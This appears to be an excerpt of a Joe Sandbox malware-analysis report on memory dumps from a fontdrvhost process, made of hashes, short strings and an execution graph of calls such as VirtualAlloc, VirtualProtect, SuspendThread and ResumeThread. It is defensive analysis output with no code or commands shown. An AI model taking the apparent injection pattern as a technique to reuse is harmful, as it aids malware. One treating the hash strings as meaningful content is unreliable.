                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                                    • Instruction ID: 9b94548bcea625e1088c9e69c66b4fd2dae1edc2df189d4bac9fec5d32b0723c
                                                                    • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                                    • Instruction Fuzzy Hash: 48D0C912F0C603C5F138D6C1417123E21B9AF00382E20007FD25F719C1CD1C7A93A20D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:8.2%
                                                                    Dynamic/Decrypted Code Coverage:88.9%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:18
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 47630 7ffd9bbb1f85 47631 7ffd9bbb1f9f GetFileAttributesW 47630->47631 47633 7ffd9bbb2065 47631->47633 47638 7ffd9bbb02f9 47639 7ffd9bbb0307 FindCloseChangeNotification 47638->47639 47641 7ffd9bbb03e4 47639->47641 47634 7ffd9bbb0190 47635 7ffd9bbb019a ResumeThread 47634->47635 47637 7ffd9bbb02a4 47635->47637 47642 7ffd9bbaeaad 47643 7ffd9bbaeabb SuspendThread 47642->47643 47645 7ffd9bbaeb94 47643->47645 47626 7ffd9ba0201e 47627 7ffd9ba0202d VirtualProtect 47626->47627 47629 7ffd9ba0216d 47627->47629 47622 7ffd9ba03a0d 47623 7ffd9ba03a2f VirtualAlloc 47622->47623 47625 7ffd9ba03b45 47623->47625

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: jX_H
                                                                    • API String ID: 0-1381252938
                                                                    • Opcode ID: cb747480b85ae157accdaf6b2a08e28e9f9633afc4e1cdd1d273ad6aef43858b
                                                                    • Instruction ID: 56711f0a79feec0a03c67ff154c71b9b05519fb1e1f23ca94bad0ec260dae0e9
                                                                    • Opcode Fuzzy Hash: cb747480b85ae157accdaf6b2a08e28e9f9633afc4e1cdd1d273ad6aef43858b
                                                                    • Instruction Fuzzy Hash: 53B20C70E0991D8FDBA8EF58C8A5AA8B7B1FB59300F5441EAD04DE3291DE756E81CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 385bda896fc5a1bd923a44321d3e1f683e117acde8375b6c06e61d3f5f34d13c
                                                                    • Instruction ID: eb6620716ca2fcde172ebd815047282bb5057d2e20a4a40612b76ae1c0f7b26b
                                                                    • Opcode Fuzzy Hash: 385bda896fc5a1bd923a44321d3e1f683e117acde8375b6c06e61d3f5f34d13c
                                                                    • Instruction Fuzzy Hash: 58529130A1865A8FEB68DF58C4A56B877B1FF55300F5042BDE45ECB2C6DB38A981CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $X1_H
                                                                    • API String ID: 0-3961195906
                                                                    • Opcode ID: ea364f6295760fb2ecd1688b3652a1ae8c5d54f268a9d53bf4838dda1ed6c44a
                                                                    • Instruction ID: 2235b8f45b81bdc67e765d16357a9108c45824f8513ecd2a11bfaa1b97a57a64
                                                                    • Opcode Fuzzy Hash: ea364f6295760fb2ecd1688b3652a1ae8c5d54f268a9d53bf4838dda1ed6c44a
                                                                    • Instruction Fuzzy Hash: 7E517C71E0950E8FDB59EB98C4A55FDBBB1FF55304F1140BAC01AE72D6DA386941CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: r^^
                                                                    • API String ID: 0-2110808769
                                                                    • Opcode ID: 5ca395970e8d484b59e319911eb5ac938ceac7bb9f473067d2194e9d3bfecb98
                                                                    • Instruction ID: 5146a7b34c57ee64f636f157aebe234896cc24f96d4dfde7d3c62bbdfb0f9a7b
                                                                    • Opcode Fuzzy Hash: 5ca395970e8d484b59e319911eb5ac938ceac7bb9f473067d2194e9d3bfecb98
                                                                    • Instruction Fuzzy Hash: C972EA12F0D3634BF722BBACA4F59E67BE09F12268F0902F7E05D490D3EE09694592D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^X_H
                                                                    • API String ID: 0-756895932
                                                                    • Opcode ID: dbccc6222959e452bf791cb09b9081e1b2a27bccda7d53de94ceb20612059ef7
                                                                    • Instruction ID: ab01cce0ca866e6842159afe4b68e8859d56c8a198d9d5ba15f65897eaefdbe3
                                                                    • Opcode Fuzzy Hash: dbccc6222959e452bf791cb09b9081e1b2a27bccda7d53de94ceb20612059ef7
                                                                    • Instruction Fuzzy Hash: A9521071E0992D8FEBA4EF58C8A97A8B7B1FB59300F4401FAD04DD3191DA786E858F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^8
                                                                    • API String ID: 0-1095223944
                                                                    • Opcode ID: 2fe8ad2c0737e2c0a5ae8fa5adcf8d68c3ed2595147cb61c749edca4351ddd3a
                                                                    • Instruction ID: a04c5be144b5be0e86b6ccd28b4f9d4ed30a83851f8fcde782446aa6450d960c
                                                                    • Opcode Fuzzy Hash: 2fe8ad2c0737e2c0a5ae8fa5adcf8d68c3ed2595147cb61c749edca4351ddd3a
                                                                    • Instruction Fuzzy Hash: 3F510C31B0C61B8FE775BBA894625F877F0EF04390F1903B6E44D860D6EF29684596C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: k@
                                                                    • API String ID: 0-350512992
                                                                    • Opcode ID: f579f6c6d0dd53790c3022d843e050274251bae2224785f2adda810b7600d180
                                                                    • Instruction ID: 5d56ad453f1af1ef644d2228017561de20c2bbdc2ec4eb7f7683066003e3dc2b
                                                                    • Opcode Fuzzy Hash: f579f6c6d0dd53790c3022d843e050274251bae2224785f2adda810b7600d180
                                                                    • Instruction Fuzzy Hash: 79D1C33461954A8FEB68DF58C0E06B577A1FF45304B5546BDC84BCB69BCA38F982CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: k@
                                                                    • API String ID: 0-350512992
                                                                    • Opcode ID: ca370307a954c94519d58f6d4a2c5ff94a9df851b584f8fa48495847243fe028
                                                                    • Instruction ID: 92054b980b0872e42da85cfe1153e13c2e994fc943b18960a2a1ecd785e2716f
                                                                    • Opcode Fuzzy Hash: ca370307a954c94519d58f6d4a2c5ff94a9df851b584f8fa48495847243fe028
                                                                    • Instruction Fuzzy Hash: 2CC1E33061954A8BEB29DF58C0E05B577A1FF45308B5546BDC84B8B6DBCA38F982CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \1_H
                                                                    • API String ID: 0-3222431896
                                                                    • Opcode ID: 2c92e7f8f8632a884981930cbd4d2109644e08e99c9c0fc1c7e2713e3e2d2198
                                                                    • Instruction ID: 9ec942af124fd09fb2da5225e509af48232a085de93bd1525425f8a0abe353c4
                                                                    • Opcode Fuzzy Hash: 2c92e7f8f8632a884981930cbd4d2109644e08e99c9c0fc1c7e2713e3e2d2198
                                                                    • Instruction Fuzzy Hash: 27C1C430B09A4A5FE759EB6CC0A06B4B7A1FF68304F55417AD04EC7AD6DB28B951CBC0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^
                                                                    • API String ID: 0-2541302950
                                                                    • Opcode ID: a56ab3c0dbcca72e590f43c097e8e578837340ab49578afda2127576d787fd12
                                                                    • Instruction ID: 5705454b9860d528fbd9d6fc25bfca98652b1527ba45f44e2b9926bec57d7ed8
                                                                    • Opcode Fuzzy Hash: a56ab3c0dbcca72e590f43c097e8e578837340ab49578afda2127576d787fd12
                                                                    • Instruction Fuzzy Hash: B931A421B0C75B8FE775DB9484621B8B6F0EF05390F1803B9E08DC21C2EF286805A782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K/
                                                                    • API String ID: 0-1550663435
                                                                    • Opcode ID: 6661770a40ba3ff4a68fceb43fb83a61efc7f56a222e2138a2c1e6cdf464d3fa
                                                                    • Instruction ID: 9faaea365bf5237d98a9ef99bad5e9eae7679a2d36bf5d55821973e0b469e685
                                                                    • Opcode Fuzzy Hash: 6661770a40ba3ff4a68fceb43fb83a61efc7f56a222e2138a2c1e6cdf464d3fa
                                                                    • Instruction Fuzzy Hash: ED81E531A0EA4E8BE738EB6C94751B977E0FF45318B15457ED48EC21D2DE29B902C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: cd462d82f8fadf7de7080eead29c29e8ac00b60a570d3d8f81de8aca6bb0a168
                                                                    • Instruction ID: 629dc2d867d33cded1398535b3dce840cd9f5836a6cba4719dbe1e1e8c8d65f5
                                                                    • Opcode Fuzzy Hash: cd462d82f8fadf7de7080eead29c29e8ac00b60a570d3d8f81de8aca6bb0a168
                                                                    • Instruction Fuzzy Hash: 53514A71E0860A8FDB69DB98C4606BDB7B1EF54341F1042BAE01EEB2D6DB396941DB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: f98396f53d1e93b8f62d0bc9865a148c1e573de2d83b17476a5fa5347c667167
                                                                    • Instruction ID: 1c36f167d937210ae9c5cdc4ee7ff8e4c41aaf9516da8b275bfae7767ee9ee0a
                                                                    • Opcode Fuzzy Hash: f98396f53d1e93b8f62d0bc9865a148c1e573de2d83b17476a5fa5347c667167
                                                                    • Instruction Fuzzy Hash: 4D514931E4860B8FDB69DF98C4A55BDB7B1FF54388F5041BAD01EA7296CB396801DB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 9447b1e12c7ca689ceef8c5df9acad8c181461de9d9361176fd10d8e7f80ea95
                                                                    • Instruction ID: 84a4304f62ffd5532ad84cfe203ca1fb9c125b709232dc28b4959d0ac54c64ff
                                                                    • Opcode Fuzzy Hash: 9447b1e12c7ca689ceef8c5df9acad8c181461de9d9361176fd10d8e7f80ea95
                                                                    • Instruction Fuzzy Hash: 93514A31E0950E8FDB58EB98C8659BDB7B1FF54305F1140BED41AE72E6CA396A01CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA06000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA06000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba06000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *
                                                                    • API String ID: 0-163128923
                                                                    • Opcode ID: a4da3ef370e5b789b0245ef8702a72624d38bff71e41aa57300dab3265010f7e
                                                                    • Instruction ID: 99697bfce5100a8b9e3365c8019ef667a08aca62844f6153bf86982899817369
                                                                    • Opcode Fuzzy Hash: a4da3ef370e5b789b0245ef8702a72624d38bff71e41aa57300dab3265010f7e
                                                                    • Instruction Fuzzy Hash: DF11F370A1951D8FEBBCDB08C8A4BE8B7B1FB58304F1002F9D04ED2295CA786B818F55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 902fbc76a139301a8e3ac18e597168e3af11c60f88d285bf8c55edd550a3d195
                                                                    • Instruction ID: 293149367e47bf10aa77de2c5095f078941939c2684cee05a8deaa409020c56a
                                                                    • Opcode Fuzzy Hash: 902fbc76a139301a8e3ac18e597168e3af11c60f88d285bf8c55edd550a3d195
                                                                    • Instruction Fuzzy Hash: 34725470A4891D8FDFA9EF18C894FA977B1FB68705F1141E9900EE7265DA31AE81CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: feb940b1e3eabfa5d8be0192b5eef09affb830d0e0ca8cb18dd9d67ea780a20a
                                                                    • Instruction ID: 356c1adc0d41e5509f8f7e0d50c5978c20e88b63ced5b3ffcde334cd50fa07e0
                                                                    • Opcode Fuzzy Hash: feb940b1e3eabfa5d8be0192b5eef09affb830d0e0ca8cb18dd9d67ea780a20a
                                                                    • Instruction Fuzzy Hash: 75326430A18A1A8FDBA8DB5CC875A7977F1FF58310F5042B9E01EC7296EB25AC45CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 052ee0f12563d1fcb4cd8bd88171e562ea23c11c9c70ec9d173136084aef7f86
                                                                    • Instruction ID: 6df91fbf0c2ec7ffbf563f7e276cdd8c3b74b48c5dd4c948dd751c8af479454b
                                                                    • Opcode Fuzzy Hash: 052ee0f12563d1fcb4cd8bd88171e562ea23c11c9c70ec9d173136084aef7f86
                                                                    • Instruction Fuzzy Hash: 1C71E722B0C3578AF73676E464655F82FB09F017E0F1A02B7F46E860D7EE1D2845A2D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0016f6e91a097346098d28bf41f0e055a51d8d0cf550b1b648fc6d4ffa49442e
                                                                    • Instruction ID: 0ff6a8df31dca3e7e18ae9a912722f368cf84cf5125374cc52306620a22740ce
                                                                    • Opcode Fuzzy Hash: 0016f6e91a097346098d28bf41f0e055a51d8d0cf550b1b648fc6d4ffa49442e
                                                                    • Instruction Fuzzy Hash: D741D412F0C22789F23977E874719F91BA09F007E4F164377F86E4A0C7AE1A2C85A6D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e2986672294a52255c718c63bb29729c4ffba8aac989e5d16d7b8ea3e20604fa
                                                                    • Instruction ID: 124295e079ce15d6a51c731add4d1a1eaba754a3554d3015a3d7791583c62404
                                                                    • Opcode Fuzzy Hash: e2986672294a52255c718c63bb29729c4ffba8aac989e5d16d7b8ea3e20604fa
                                                                    • Instruction Fuzzy Hash: A8F15070A08A8E8FEBB8EF28C865BE937E1FF59351F00412AD84ED7291DB749544CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3583f6cb317e1d4d28e4e259ee11f027e8f81c5c7a1b1bdccd75c4cb8f6c4886
                                                                    • Instruction ID: b4dc65455f6e7fd828ad53fbc3e43281c9aef2cad8853bcf287ccba2810c0465
                                                                    • Opcode Fuzzy Hash: 3583f6cb317e1d4d28e4e259ee11f027e8f81c5c7a1b1bdccd75c4cb8f6c4886
                                                                    • Instruction Fuzzy Hash: CAE1AC30A0CB078BE368DB68D4A557577B1FF44394F5446BEE48EC3682EB29B8429B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae01f2b937a838bf4d4c016ee41761d75d0bee1057bb520663f9d26703987ebe
                                                                    • Instruction ID: c7836f79aa06784e59cb2c4952b281c1b4704fbe9be96a1316c879e60cbec276
                                                                    • Opcode Fuzzy Hash: ae01f2b937a838bf4d4c016ee41761d75d0bee1057bb520663f9d26703987ebe
                                                                    • Instruction Fuzzy Hash: 20E1E231A0EA0A8FD369EF6DC4A057577E1FF44318B21457EC49AC36E2DE29B942C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1050e0100f6c510eb68798f4dbc499880ad3af4557f811a87754257f5d75b95f
                                                                    • Instruction ID: bd5235f44aaa35372a7a92c38b415d149943440a79ecd1fa899780b59274ae42
                                                                    • Opcode Fuzzy Hash: 1050e0100f6c510eb68798f4dbc499880ad3af4557f811a87754257f5d75b95f
                                                                    • Instruction Fuzzy Hash: FBD1AD306585568BEB58CF48C4E06B137B2FF45390B5446BDC85E8B68BCB38E892DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6ca69c62df077648256bdad0349d78534d8e4f0c53d4938914dc7732d7f58162
                                                                    • Instruction ID: bbeb902b90c787aedfc92fb7948637b5fa9fe7e009198acb893cb47b8e52da6a
                                                                    • Opcode Fuzzy Hash: 6ca69c62df077648256bdad0349d78534d8e4f0c53d4938914dc7732d7f58162
                                                                    • Instruction Fuzzy Hash: F5B1BD31B8C64B8FE7789BA884615B877B0FF54380F2405BED45EC3183DF29A941A782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25e7f14f538ea338f071eebc8053bcbc8edd3e08f52822797027e81af366e931
                                                                    • Instruction ID: 6599ec4574a0cea46d9d1002d84ff8ad69a52f2a0118c86b83f65f0f994d9289
                                                                    • Opcode Fuzzy Hash: 25e7f14f538ea338f071eebc8053bcbc8edd3e08f52822797027e81af366e931
                                                                    • Instruction Fuzzy Hash: 6AC1B130A1954A8BEB29DF58C0E49B137A1FF55304B6545BED84B8B6DFCA38F942CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 097c5d661ad5d2d48e542d8e09c84981fbfad7dee351bf25c821592c147db9b9
                                                                    • Instruction ID: 670fdcc397d49691e5caeae94da0ee4178af085904dd15150befed000df8fdd9
                                                                    • Opcode Fuzzy Hash: 097c5d661ad5d2d48e542d8e09c84981fbfad7dee351bf25c821592c147db9b9
                                                                    • Instruction Fuzzy Hash: 7BC1AC30A585578BEB29CF44C4E05B137B2FF45394B5446BDC85E8B68BCB38E891DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07d84e5fb03a4dfc62c5286d349a20e417e1413d551e68beea9d75725357ea50
                                                                    • Instruction ID: acc96a3aa730731ae9e531852fcfd414cdcfd3b1a06b8260cb462164cd2d4edc
                                                                    • Opcode Fuzzy Hash: 07d84e5fb03a4dfc62c5286d349a20e417e1413d551e68beea9d75725357ea50
                                                                    • Instruction Fuzzy Hash: 63C1B0306186568BEB29CF58C0E05B57BB1FF45350B5446BDE85E8F6CADB38E881CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da471b5c07bfb132d3d3182b1c993609ffc9009a2fb7ae3c17548d86354476cb
                                                                    • Instruction ID: 8b3d5552bea07ff8fd2d8b7476d942628173f8c393aa25d6bc049500627dd0e9
                                                                    • Opcode Fuzzy Hash: da471b5c07bfb132d3d3182b1c993609ffc9009a2fb7ae3c17548d86354476cb
